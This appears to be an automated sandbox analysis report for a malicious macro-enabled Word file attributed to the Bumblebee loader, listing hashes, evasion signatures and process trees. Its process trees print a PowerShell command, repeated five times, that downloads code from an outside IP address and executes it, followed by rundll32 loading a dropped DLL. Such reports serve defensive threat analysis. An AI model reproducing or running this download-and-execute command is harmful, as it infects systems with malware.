Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
20-03-2024 09:25
Behavioral task
behavioral1
Sample
434775.docm
Resource
win7-20240215-en
General
-
Target
434775.docm
-
Size
53KB
-
MD5
8361467d6ef12ab5cdc89ac03eda2630
-
SHA1
778a76a890425fa2ffa81cc46aedbee761bfdae2
-
SHA256
8b0ef4e50ddad2036e3d85e87a0cd53e3ae0a436ea4fff99fd4ddb845e4f265f
-
SHA512
fdab4e67756e2a7a8a0813eeabeeb5d8699eb702c0e04c1c31c8ec32f0189a6638f4e88cbe4ff34259075b98ccc33108236ca1dc969200a0e0f1475480dc11c9
-
SSDEEP
1536:JbxVjYWdp4RvikgWUNXRIDBXceQ2JKAgMY+9/w0G:mv5g3NXRI/Q2BJYQM
Malware Config
Extracted
bumblebee
asd123
Signatures
-
Process spawned unexpected child process 5 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 728 4944 wscript.exe 87 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2604 4944 wscript.exe 87 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1220 4944 wscript.exe 87 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3816 4944 wscript.exe 87 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1548 4944 wscript.exe 87 -
Blocklisted process makes network request 11 IoCs
flow pid Process 87 3212 powershell.exe 90 4056 rundll32.exe 92 2824 powershell.exe 94 4056 rundll32.exe 96 4008 powershell.exe 98 4056 rundll32.exe 101 4056 rundll32.exe 103 2696 powershell.exe 105 4056 rundll32.exe 110 3244 powershell.exe 113 4056 rundll32.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation wscript.exe -
Loads dropped DLL 5 IoCs
pid Process 4056 rundll32.exe 1208 rundll32.exe 4516 rundll32.exe 2616 rundll32.exe 2864 rundll32.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 4 IoCs
pid Process 4056 rundll32.exe 1208 rundll32.exe 4516 rundll32.exe 2616 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3836 WINWORD.EXE 3836 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 3212 powershell.exe 3212 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 4008 powershell.exe 4008 powershell.exe 4008 powershell.exe 2696 powershell.exe 2696 powershell.exe 3244 powershell.exe 3244 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 3212 powershell.exe Token: SeDebugPrivilege 2824 powershell.exe Token: SeDebugPrivilege 4008 powershell.exe Token: SeDebugPrivilege 2696 powershell.exe Token: SeDebugPrivilege 3244 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 3836 WINWORD.EXE 3836 WINWORD.EXE 3836 WINWORD.EXE 3836 WINWORD.EXE 3836 WINWORD.EXE 3836 WINWORD.EXE 3836 WINWORD.EXE -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 728 wrote to memory of 3212 728 wscript.exe 113 PID 728 wrote to memory of 3212 728 wscript.exe 113 PID 3212 wrote to memory of 4056 3212 powershell.exe 115 PID 3212 wrote to memory of 4056 3212 powershell.exe 115 PID 2604 wrote to memory of 2824 2604 wscript.exe 117 PID 2604 wrote to memory of 2824 2604 wscript.exe 117 PID 2824 wrote to memory of 1208 2824 powershell.exe 119 PID 2824 wrote to memory of 1208 2824 powershell.exe 119 PID 1220 wrote to memory of 4008 1220 wscript.exe 121 PID 1220 wrote to memory of 4008 1220 wscript.exe 121 PID 4008 wrote to memory of 4516 4008 powershell.exe 123 PID 4008 wrote to memory of 4516 4008 powershell.exe 123 PID 3816 wrote to memory of 2696 3816 wscript.exe 127 PID 3816 wrote to memory of 2696 3816 wscript.exe 127 PID 2696 wrote to memory of 2616 2696 powershell.exe 129 PID 2696 wrote to memory of 2616 2696 powershell.exe 129 PID 1548 wrote to memory of 3244 1548 wscript.exe 131 PID 1548 wrote to memory of 3244 1548 wscript.exe 131 PID 3244 wrote to memory of 2864 3244 powershell.exe 133 PID 3244 wrote to memory of 2864 3244 powershell.exe 133
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\434775.docm" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3836
-
C:\Windows\system32\wscript.exewscript /E:vbscript C:\Users\Admin\AppData\Local\Temp\radE9EA1.tmp1⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://192.121.17.93/update_ver')|iex"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3212 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\w_ver.dll DllRegisterServer3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
PID:4056
-
-
-
C:\Windows\system32\wscript.exewscript /E:vbscript C:\Users\Admin\AppData\Local\Temp\radF05C2.tmp1⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://192.121.17.93/update_ver')|iex"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\w_ver.dll DllRegisterServer3⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
PID:1208
-
-
-
C:\Windows\system32\wscript.exewscript /E:vbscript C:\Users\Admin\AppData\Local\Temp\rad67B23.tmp1⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1220 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://192.121.17.93/update_ver')|iex"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\w_ver.dll DllRegisterServer3⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
PID:4516
-
-
-
C:\Windows\system32\wscript.exewscript /E:vbscript C:\Users\Admin\AppData\Local\Temp\radF2D91.tmp1⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://192.121.17.93/update_ver')|iex"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\w_ver.dll DllRegisterServer3⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
PID:2616
-
-
-
C:\Windows\system32\wscript.exewscript /E:vbscript C:\Users\Admin\AppData\Local\Temp\radD1B37.tmp1⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://192.121.17.93/update_ver')|iex"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3244 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\w_ver.dll DllRegisterServer3⤵
- Loads dropped DLL
PID:2864
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD5bbad59fd06310773f926b8c529002267
SHA1792cafee7795533544c5bde8fd9f8e2ac5d9a083
SHA25678a4d72e5865388ec2797f56713d32f0feef5c1ff4e006c265a559e5c890a8c4
SHA5124cd761f0413e5844259e8cdb88e765c53bd3acaa5abd3f2db69f8a00898efa90c82fe652dd8d647484066763ebb558fb45e7f29b93c16fefbe80242e787441dc
-
Filesize
1KB
MD52564df41d7c76389ff667383105aac61
SHA1ef1fe8b3d181e9135f8de2836e6ab2281d915004
SHA2561c3adec7c91bcd8c7d7c35f637ec8ee3a433b966e6f5c9fcc5529726b5c2bfd4
SHA51223d2001b54b6d9b7a17f67730d495a8c8acc46e80f81bd0c27f9d262edc7512ea23d5231a5a606d3376bff85a25c87b4c8165c8ec5f3a5a8478bd7d5c5651952
-
Filesize
1KB
MD51a39c18554934730b60a3ac2ede06158
SHA15d65dfe8a22d6e6e5ed965fa314dc8799bc14d7b
SHA256cce07c5394ccce0eb2be9afc08b6359c1675625de30c3f479ffd445c36076dd2
SHA512e08ab7bdcc4354d1160f53760ce9b3ef31a1d1cbc093b3d310f5bc0f52803a52cc6ebe888b23ac5988bc7b555e94031d50a50d6b1a0ff37fff5f12a463d1468a
-
Filesize
1KB
MD578cbc1399d944adf4aebf17f4571ca50
SHA11a555fbc4b5bab26d0b2508a081af3380049e172
SHA256482616556214a15c5d65c10a5fd0130f11562536b9d2d9efa30fb59734ac52bc
SHA5129898951fedc428371fa6a5cfb169f0e33d4c0a3f22a62f75b5d02f6948c9bd1c256d7361fa63bacc8ce11c507aec64bcde099ed37e6d37052dd62e9ccd235ba4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
237B
MD52d8a9d6cbd295e7e3ef5db8edbd0b765
SHA1461b708cd202a2f7b9730ec2bdb14c0df7ab5bb0
SHA256243f6e690985e84e9056fa67850920281431fe76c368ae9ef72a241c5594ea5d
SHA512720d70128caf0bc9668d0411023a8ac79708fce3e49ce08e7e037011de6e157452dadc29913d801c6699d0cb0836a25b67eaadecb8884e2e2f5fa41be0a9e76e
-
Filesize
3.8MB
MD5a717330076ea1feb85ec0a4febd8c25f
SHA14505163a8ba330be2ec92d026be02487cf90829d
SHA256d511b138363d9308f3e78731a6aab1e8860cca3e4b77120bc5d2d9d947632a36
SHA512f763cab1653794057e5efc803604a8173e7079970a805d781f02a6f84bc9d347775ff09f4ca15023ef8b379cdeb9ee6926e1d4422a29c5fb5d301d1e17b7bc9b
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84